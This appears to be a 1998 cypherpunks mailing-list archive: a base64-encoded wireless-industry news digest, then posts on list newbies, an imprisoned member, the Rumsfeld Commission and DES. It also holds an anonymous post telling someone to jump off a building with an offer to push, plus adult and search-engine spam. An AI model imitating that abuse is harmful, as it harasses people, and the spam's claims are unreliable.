Q0U9IkFyaWFsLEhlbHZldGljYSI+TmVhcmx5IDMwMCBHZW9yZ2lhIFN0YXRl
IFBhdHJvbCB0cm9vcGVycwphbmQgY29tbWFuZCBwZXJzb25uZWwgYXJlIHVz
aW5nIFNvdXRoZXJuIExJTkMsIHdoaWNoIGNvbWJpbmVzIHR3by13YXkgcmFk
aW8sCm1vYmlsZSBwaG9uZSBzZXJ2aWNlLCBudW1lcmljIGFuZCB0ZXh0IHBh
Z2luZyBhbmQgZGF0YSB0cmFuc21pc3Npb24gaW4Kb25lIGhhbmQtaGVsZCBv
ciBpbnN0YWxsZWQgZGV2aWNlLiAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhv
by5jb20vYncvOTgwOTAxL3NvdXRoZXJuX2xfMS5odG1sIj5ZQUhPTzwvQT4p
PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBTSVpFPSsxPlRlbGlnZW50IGluIEFjY2VzcyBQYWN0CndpdGggVS5TLiBS
ZWFsVGVsPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPlRlbGlnZW50IGlzIHRvIG9mZmVyIHRlbGVjb21tdW5pY2F0aW9u
cwpzZXJ2aWNlcyB0byBjdXN0b21lcnMgaW4gbW9yZSB0aGFuIDIwMCBvZiBV
LlMuIFJlYWxUZWwncyBjb21tZXJjaWFsIGJ1aWxkaW5ncwpuYXRpb253aWRl
LiBBY2NvcmRpbmcgdG8gVGVsaWdlbnQsIGV4aXN0aW5nIG9yIHJlY2VudGx5
IGluc3RhbGxlZCBpbnNpZGUKd2lyaW5nIHdpbGwgY29ubmVjdCBhIHNtYWxs
IGFudGVubmEsIHdoaWNoIGlzIHBsYWNlZCBhdG9wIHRoZSBjdXN0b21lcidz
CnJvb2YsIHdpdGggdGhlIGN1c3RvbWVyJ3MgdGVsZXBob25lIGVxdWlwbWVu
dCwgcGVyc29uYWwgY29tcHV0ZXJzLCBkYXRhCm5ldHdvcmtzLCBvciB2aWRl
b2NvbmZlcmVuY2luZyBmYWNpbGl0aWVzLiBUZWxpZ2VudCdzIHJlY2VudCBh
Z3JlZW1lbnRzCmluY2x1ZGUgYSBwYWN0IHdpdGggcmVhbCBlc3RhdGUgaW52
ZXN0bWVudCB0cnVzdCBDYXJyQW1lcmljYSBSZWFsdHkuICg8QSBIUkVGPSJo
dHRwOi8vYml6LnlhaG9vLmNvbS9maW5hbmNlLzk4MDgzMS90ZWxpZ2VudF90
XzEuaHRtbCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5Fcmljc3NvbiBPZmZlcnMg
TW9iaWxlCkFjY2VzcyB0byBMb2NhbCBBcmVhIE5ldHdvcmtzPC9GT05UPjwv
Rk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkVyaWNzc29u
IHdpbGwgaGF2ZSBhIGZ1bGwgcmFuZ2Ugb2YgV2lyZWxlc3MKTEFOIHByb2R1
Y3RzIGF2YWlsYWJsZSBieSB0aGUgZW5kIG9mIDE5OTguICg8QSBIUkVGPSJo
dHRwOi8vYml6LnlhaG9vLmNvbS9idy85ODA5MDEvZXJpY3Nzb25fMy5odG1s
Ij5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPkRTUCBBcmNoaXRlY3R1cmVzIFRhcmdl
dApOZXh0LUdlbmVyYXRpb24gQ2VsbCBQaG9uZXM8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+RFNQIEdyb3VwIGFuZCBQ
aGlsbGlwcyBTZW1pY29uZHVjdG9ycwpoYXZlIGFubm91bmNlZCBuZXcgZGln
aXRhbCBzaWduYWwtcHJvY2Vzc2luZyAoRFNQKSBhcmNoaXRlY3R1cmVzLiBE
U1AgR3JvdXAKaGFzIHVudmVpbGVkIGl0cyBQYWxtIGNvcmUsIGEgbXVsdGlw
bGUtbXVsdGlwbHktYWNjdW11bGF0b3IgY29yZSBkZXNpZ25lZApmb3IgbW9i
aWxlIHBob25lIGFwcGxpY2F0aW9ucy4gV29ya2luZyBhdCBzcGVlZHMgb2Yg
dXAgdG8gNDUwIG1pbGxpb24gaW5zdHJ1Y3Rpb25zCnBlciBzZWNvbmQsIGFj
Y29yZGluZyB0byBhIHZlbmRvciwgdGhlIFBhbG1EU1BDb3JlIGNhbiBiZSBp
bnRlZ3JhdGVkIGludG8Kd2lyZWxlc3MgdGVjaG5vbG9neSwgaW5jbHVkaW5n
IHNlcnZpY2VzIHN1Y2ggYXMgd2lkZWJhbmQgQ0RNQSwgdGhlIFVuaXZlcnNh
bApNb2JpbGUgVGVsZWNvbW11bmljYXRpb25zIFN5c3RlbSwgYW5kIElNVC0y
MDAwIGludGVybmF0aW9uYWwgbW9iaWxlIGNvbW11bmljYXRpb25zLiZuYnNw
OwooPEEgSFJFRj0iaHR0cDovL3d3dy50ZWNod2ViLmNvbS93aXJlL3N0b3J5
L1RXQjE5OTgwODMxUzAwMDgiPlRFQ0hXRUI8L0E+KTwvRk9OVD48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5TcHln
bGFzcyBSZWxlYXNlcyBXZWIKQnJvd3NlciBUZWNobm9sb2d5Jm5ic3A7PC9G
T05UPjwvRk9OVD48L0I+Jm5ic3A7CjxCUj48Qj48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+Zm9yIHRoZSBNaWNyb3NvZnQg
V2luZG93cwpDRSBPcGVyYXRpbmcgU3lzdGVtPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlRoZSBjb21wYW55IGhhcyBk
ZXZlbG9wZWQgYSB2ZXJzaW9uIG9mCml0cyBTcHlnbGFzcyBEZXZpY2UgTW9z
YWljIFdlYiBicm93c2VyIHRlY2hub2xvZ3kgZm9yIHVzZSBvbiB0aGUgTWlj
cm9zb2Z0KFIpCldpbmRvd3MoUikgQ0Ugb3BlcmF0aW5nIHN5c3RlbS4gKDxB
IEhSRUY9Imh0dHA6Ly9iaXoueWFob28uY29tL3BybmV3cy85ODA5MDEvaWxf
c3B5Z2xhc18xLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+Q1RJQSBDb3Vu
dGVycyBSZXNlbGxlcnMKQXJndW1lbnQgb24gTnVtYmVyIFBvcnRhYmlsaXR5
IElzc3VlPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPlRoZSBDZWxsdWxhciBUZWxlY29tbXVuaWNhdGlvbnMgSW5kdXN0
cnkKQXNzb2NpYXRpb24gKENUSUEpIGhhcyBmaWxlZCBjb21tZW50cyB3aXRo
IHRoZSBGZWRlcmFsIENvbW11bmljYXRpb25zIENvbW1pc3Npb24KKEZDQykg
dGFraW5nIGV4Y2VwdGlvbiB0byB0aGUgVGVsZWNvbW11bmljYXRpb25zIFJl
c2VsbGVycyBBc3NvY2lhdGlvbgooVFJBKSBjb250ZW50aW9uIHRoYXQgdGhl
cmUgYXJlIHByYWN0aWNhbCBhbmQgcmVsYXRpdmVseSBlYXN5IHdheXMgZm9y
CnRoZSB3aXJlbGVzcyBpbmR1c3RyeSB0byBvZmZlciBudW1iZXIgcG9ydGFi
aWxpdHkgdG8gY3VzdG9tZXJzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9yZXN1bHRzL3Byb2Zlc3Npb25hbC9uZXdzL2ZyYW1laW5kZXgu
Y2ZtP2FydGljbGVpZD0zMzgxIj5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+U3F1
YXNoaW5nIHRoZSBNaWxsZW5uaXVtCkJ1ZyB0byBDb3N0IEJpbGxpb25zPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkVz
dGltYXRlcyB3aXRoaW4gdGhlIFVuaXRlZCBTdGF0ZXMgYWxvbmUKYXBwcm9h
Y2ggJDMwMCBiaWxsaW9uIGZvciB0aGUgZml4IGFuZCBhbiBlcXVhbCBhbW91
bnQgZm9yIGxpdGlnYXRpb24uICg8QSBIUkVGPSJodHRwOi8vd3d3LmJvc3Rv
bi5jb20vZGFpbHlnbG9iZS9nbG9iZWh0bWwvMjQ0L1NxdWFzaGluZ190aGVf
bWlsbGVubml1bV9idWcuc2h0bWwiPkJPU1RPTgpHTE9CRTwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPlUgUyBXRVNUIEdvZXMgQmFjayB0bwpXb3JrPC9GT05UPjwvRk9OVD48
L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlNvbWUgMzUsMDAwIFUg
UyBXRVNUIGVtcGxveWVlcyBiZWdhbiBmaWx0ZXJpbmcKYmFjayB0byB0aGVp
ciBqb2JzIE1vbmRheS4mbmJzcDsgVGhleSBjb25mcm9udCBhIGJhY2tsb2cg
b2Ygb3JkZXJzIGZvcgpwaG9uZSByZXBhaXJzIGFuZCBuZXcgaW5zdGFsbGF0
aW9ucywgYW5kIHF1ZXN0aW9ucyBhYm91dCB3aGF0IHRoZSB3b3JrCmF0bW9z
cGhlcmUgd2lsbCBiZSBsaWtlLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5kZW52
ZXJwb3N0LmNvbS9idXNpbmVzcy9iaXowOTAxZC5odG0iPkRFTlZFUgpQT1NU
PC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9KzE+QmVsbCBNb2JpbGl0eSB0byBPZmZlcgpXaWxkZmly
ZSBQZXJzb25hbCBBc3Npc3RhbnQ8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+QmVsbCBNb2JpbGl0eSBhbmQgV2lsZGZp
cmUgQ29tbXVuaWNhdGlvbnMsCkluYy4sIHRvZGF5IGFubm91bmNlZCB0aGF0
IEJlbGwgTW9iaWxpdHkgd2lsbCBvZmZlciBXaWxkZmlyZShSKSBwZXJzb25h
bAphc3Npc3RhbnQgc2VydmljZSB0byBpdHMgc3Vic2NyaWJlcnMgaW4gdGhl
IFRvcm9udG8gYXJlYS4oPEEgSFJFRj0iaHR0cDovL2Jpei55YWhvby5jb20v
YncvOTgwOTAxL2JlbGxfbW9iaWxfMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9LTE+Rm9yIGFkZGl0aW9uYWwgbmV3cyBhYm91dAp0aGUg
d2lyZWxlc3MgaW5kdXN0cnktLWluY2x1ZGluZyBwZXJpb2RpYyBuZXdzIHVw
ZGF0ZXMgdGhyb3VnaG91dCB0aGUgZGF5LS12aXNpdAo8QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj5odHRwOi8vd3d3Lndvdy1jb20uY29tLjwv
QT48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Q1RJQSBEYWlseSBOZXdz
IGZyb20gV09XLUNPTQppcyB0cmFuc21pdHRlZCB3ZWVrZGF5cywgZXhjZXB0
IGZvciBob2xpZGF5cy4gVmlzaXQgdXMgb24gdGhlIFdvcmxkIFdpZGUKV2Vi
IGF0IDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lv
bmFsIj5odHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Npb25hbDwvQT4u
Jm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5JZiB5b3UgYXJlIG5vdCBp
bnRlcmVzdGVkCmluIHJlY2VpdmluZyB0aGUgQ1RJQSBEYWlseSBOZXdzIGZy
b20gV09XLUNPTSwgcGxlYXNlIHNlbmQgYSBtZXNzYWdlIHRvCjxBIEhSRUY9
Im1haWx0bzp1bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0eW1haWwu
Y29tIj51bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0eW1haWwuY29t
PC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+PEI+KioqPEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPiBUaGUg
dGVybSAidW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNv
bSIKbXVzdCBiZSBsaXN0ZWQgaW4gdGhlIFRPIHNlY3Rpb24gb2YgdGhlIGVt
YWlsLjwvRk9OVD48L0ZPTlQ+ICoqKjwvQj4mbmJzcDsKCjxQPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5QbGVhc2UgTm90
ZTogU29tZSBvZiB0aGUKbGlua3MgaW4gdG9kYXkncyBuZXdzIGFyZSB0aW1l
IHNlbnNpdGl2ZS4mbmJzcDsgVGhvc2UgbGlua3MgbWF5IG5vdCBiZQphdmFp
bGFibGUgYXMgbmV3cyBjaGFuZ2VzIHRocm91Z2hvdXQgdGhlIGRheS4mbmJz
cDsgQWxzbywgc29tZSBuZXdzIHNvdXJjZXMKbWF5IGJlIHN1YnNjcmlwdGlv
bi1iYXNlZCBvciByZXF1aXJlIHJlZ2lzdHJhdGlvbi48L0ZPTlQ+PC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgo8L1RB
QkxFPjwvQ0VOVEVSPgoKPENFTlRFUj4mbmJzcDs8L0NFTlRFUj4KCjwvQk9E
WT4KPC9IVE1MPgo=
--Boundary..3996.1071713804.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 1 Sep 1998 08:54:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809011554.RAA09212@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I believe by spooks he meant that you should go jump off a building before
you further insult the intelligence of the rest of the known universe.  Lord
knows you've already insulted mine enough that I'd be willing to come up
there with you and do the pushing.  Fucking dolt.


At 04:16 PM 8/31/98 -0400, ILovToHack@aol.com wrote:
>Ibelive by spooks he ment goverment agents not a racial slur so lay off.
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin ELLISON <martin@mpce.mq.edu.au>
Date: Tue, 1 Sep 1998 02:05:35 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199809010904.TAA23375@kryton.mpce.mq.edu.au>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alia Johnson <lodi@well.com>
Date: Tue, 1 Sep 1998 19:15:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: toto
Message-ID: <Pine.GSO.3.96.980901191119.16412A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


My brother, Carl E. Johnson aka C.J.Parker aka toto has asked me to let
you know that he is in prison in Florence, Arizona near Tucson under
federal charges of threatening the life of a federal officer. He was being
followed in connection with the Jim Bell case. 

He is in medical lockup and isolation, without the meds he needs for his
condition of Tourettes' syndrome. He is suffering but not incoherent.

He asked me to mention Cafe Gulag and John Young, but had to speak very
briefly so I do not know exactly what is happening. He is scheduled for a
hearing in federal court in Tucson on September 4, this Friday. I may be
there.

Alia Johnson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Tue, 1 Sep 1998 14:39:44 -0700 (PDT)
To: (STUFFED TUESDAY SEPTEMBER 1 1998)
Subject: FONDLE ME BILL: HILARIOUS NEW DOLL/OVER TWO DOZEN FREE JPEGS
Message-ID: <19980901194916.18753.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


The pics just keep on coming. And so do the amazin but
true news stories, as well as all the other goodies...

+ 28+ FREE HI-RES JPEGS
+ PAGE 2 'SPREAD' - YOU'LL LOVE THIS ONE
+ BEDDER SEX: WORKERS SPRING TO ACTION
+ HEAVEN'S GATE ANALYZED BY DR. SUSAN BLOCK PHD
+ MILE HIGH STUCK: PALAVER ON A PLANE
+ TOP 10 MALE & FEMALE FANTASIES: THIS IS HOT!
+ PANTY SPICE: WE SNIFF OUT A GREAT STORY
+ THUMBNAIL HEAVEN: MORE STUPENDOUS FREE JPEGS
+ TODAY'S SEXY STORY: 'THE SWITCH'
+ YOUR TRUE SEX SECRETS: TODAY A SELECTION OF YOUR LETTERS
+ MORE OF THE BEST WEB SITES EVER REVIEWED IN EUREKA!
+ SEXY SURPRISE THUMBS: A SURPRISE WITH EACH CLICK
+ SUPER HI-RES POSTER PIC: SAVE OR PRINT IT!

       ---->   http://stuffed.net/98/9/1/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/1/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 1 Sep 1998 19:25:38 -0700 (PDT)
To: abumujahid@taliban.com
Subject: Rumsfeld Commission report & conclusions
Message-ID: <35ECAB77.299D@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 9/1/98 7:54 PM

John Young

Nice to talk to you TWICE tonight.

I did not realize the importance of the documents I was given until 
I read them.

>From page 3

  The Rumsfeld Commission -  the commission to Assess the Ballistic    
Missile Threat to the United Sates

  .  Donald Rumsfeld
  .  Larry Welch
  .  Bill Schneider
  .  Bill Graham
  .  Bary Bleckman
  .  Richard Garwin
  .  Lee Butler

Page 14 reads

  A quick walk around the globe: Iran

  .  Placing exgraordinary interest in its WMD and ballistic
     missile programs

  .  Program benefite from a broad, long-time assistance from Russia.

  .  Development program have taken on a new phase - getting Russia's
     most modern equipement.

  . Getting assistance from China, North Korea, Pakistan as well.

  . Able to pay well for military technology - in $.

...

and ALL OF THIS IS AUTHORED BY Sandia President C Paul Robinson!

Who I saw on CBS TV tonight!

Durham

   H. B. Durham who served as project leader; 

http://jya.com/da/whpda.htm served as Robinson's technical advisor
in Geneva.

Hope jya.com readers enjoy.

I will put the document in an express mailer to you.

Let's all hope for settlement before this matter gets worse.

bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc Maffei" <marcmf@2xtreme.net>
Date: Tue, 1 Sep 1998 21:00:33 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re:
Message-ID: <02cf01bdd623$7fbaf440$532c15d1@marcmaff>
MIME-Version: 1.0
Content-Type: text/plain


hurray and I am also sorry to give this thread a longer lease in life but
hip hip hurray for the suggestion
-----Original Message-----
From: jkthomson <jkthomson@bigfoot.com>
To: ILovToHack@aol.com <ILovToHack@aol.com>; cypherpunks@toad.com
<cypherpunks@toad.com>
Date: Monday, August 31, 1998 4:13 PM
Subject: Re:


>At 04:16 PM 8/31/98 EDT, ILovToHack@aol.com wrote:
>>Ibelive by spooks he ment goverment agents not a racial slur so lay off.
>
>trust me, it's ok, he was using '32-bit AOL' to post his message, so
>EVERYONE but you realized that he was talking about garbage anyway.  maybe
>AOL64 will have a clue(tm) built in.
>
>
>an appeal to listmembers:
>
>listmembers, can't we make this list 'request for access'?  iLoV2HaCk and
>his AOL ilk are getting a little too 'elite' and 'k-rad' for me. pipebombs,
>posters, spooks, music, what the hell is happening to this list?  I know
>that I mainly lurk, but don't you think that having to request to join this
>list may filter out the worst of the AOL (et al) newbies?  they obviously
>cannot get a clue(tm) and continue to cause a landslide of off-topic
>(albeit funny) posts that ridicule them, and keep this list awash in
>non-cypherpunkish dialogue.
>
>oh, and I am also sorry for perpetuating this thread.
>
>
>
>
>-----------------------------------------------------------------------
> james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
> jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
> ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
> ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
>-----------------------------------------------------------------------
>The people to worry about are not those who openly disagree with you,
>but those who disagree with you who are too cowardly to let you know.
>=======================================================================
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc Maffei" <marcmf@2xtreme.net>
Date: Tue, 1 Sep 1998 21:03:04 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: DES Ecryption
Message-ID: <02de01bdd623$dbe29160$532c15d1@marcmaff>
MIME-Version: 1.0
Content-Type: text/plain


The exception that proves the rule

-----Original Message-----
From: FTPPork@aol.com <FTPPork@aol.com>
To: cypherpunks@toad.com <cypherpunks@toad.com>
Date: Monday, August 31, 1998 5:08 PM
Subject: DES Ecryption


>Hey, could anyone tell me what process DES Encryption goes through, or
point
>me to a site with the information?
>
>Thanx
>-Buzz-
>P.S. Please no flames because I am on AOL...
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ckzbyfaxzzz@sprintmail.com
Date: Tue, 1 Sep 1998 22:37:51 -0700 (PDT)
To: ckzbyfaxzzz@sprintmail.com
Subject: $39-700 Engines
Message-ID: <199809020404.VAA02153@littonlcs.com>
MIME-Version: 1.0
Content-Type: text/plain


___________________________________________________________
***EXTENDED FOR ONE MORE WEEK****



!!! 700 SEARCH ENGINES                                   MI5

HOME PAGE OR BUSINESS SITE!!!!!!!!*************

HURRY...THIS SPECIAL PRICE WON'T LAST LONG!!!!!  

ONLY $39

(WE HAVE TAKEN THE WORRY OUT OF INTERNET TRANSACTIONS
---SEE BELOW)


Thats right, this is not a mistake, we will submit your Website to 700 search
engines and directories for $39.  

!!!!!PLUS WE WILL PROVIDE YOU WITH A REPORT SHOWING ALL 
SUCCESFULL SUBMISSIONS!!!!



Just print out the form below and fax it us us for immediate processing. (Do not
reply via e-mail)

Name:

Name of Company:

Address:

Site URL: http://


E-mail Address:

Title of site: (25 words or less)



Description of site: (50 words or less)




Keywords: (6 total, most important first)


Phone Number:


Payment can be made by faxing a copy of your check to 714 768-3650 payable to: K.L.E.N.T. (we will
import the information from your check into our check processing software for
deposit into our bank, no need to mail check).

Or, you can pay by credit card, just fill out information and fax your info
to us and we will contact you and give you our secure URL for credit
card transactions...DO NOT INCLUDE CREDIT CARD INFO ON THIS FORM!!

If you wish information, please fax this form with your phone number that you can
be reached and one of our agents will contact you..

Worry free transaction---upon receipt of your faxed check (make out to K.L.E.N.T. ) we will submit your
site within 48 hours...it takes anywhere from 5-10 days for your faxed check to clear
your bank.  If we do not do as we say, you would have plenty of time to stop
payment on your check.  Now,  we are in the position of trusting you, as we have
already done the work and your check has not even been paid...sorry to say that we
do on occasion get a NSF check, however there are many more people that are
honorable and do not stick us with a NSF check after we have done the work. 

Credit card holders are always protected against non-delivery of product or service
through the credit card companys, now we protect our customers that pay by check
as well...I don't think you will find many companys that will do what we are doing
in order to protect the consumer.. 

We have been in business for about 3years dealing on the internet and know how
frustrating it can be dealing with someone you don't even know.   I hope that our
offer creates the validity needed in order to provide you with the service that we
provide our customers.

Ken                                                                                           MI5

K.L.E.N.T.

P.S. Reservations will only be accepted with paid orders......Thank You!
Please fax a copy of your check along with the above form....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "MD Dodson" <charlsye@worldnet.att.net>
Date: Tue, 1 Sep 1998 20:32:59 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: mailing list
Message-ID: <19980902033224.JLEB28209@default>
MIME-Version: 1.0
Content-Type: text/plain


how do I join?

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNca0hLNh2iowZ/KwEQKxxQCgzKYsHhEE71BD9cAV/ODXu9fSqs0Anipr
uLAbQMdQzZIMP0qZcp5nDwnD
=GVxP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Sep 1998 21:22:22 -0700 (PDT)
To: Alia Johnson <cypherpunks@toad.com
Subject: Re: toto
In-Reply-To: <Pine.GSO.3.96.980901191119.16412A-100000@well.com>
Message-ID: <v04011709b212770a855c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 PM -0400 on 9/1/98, Alia Johnson wrote:


> My brother, Carl E. Johnson aka C.J.Parker aka toto has asked me to let
> you know that he is in prison in Florence, Arizona near Tucson under
> federal charges of threatening the life of a federal officer.

Oh, boy... Here we go again.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
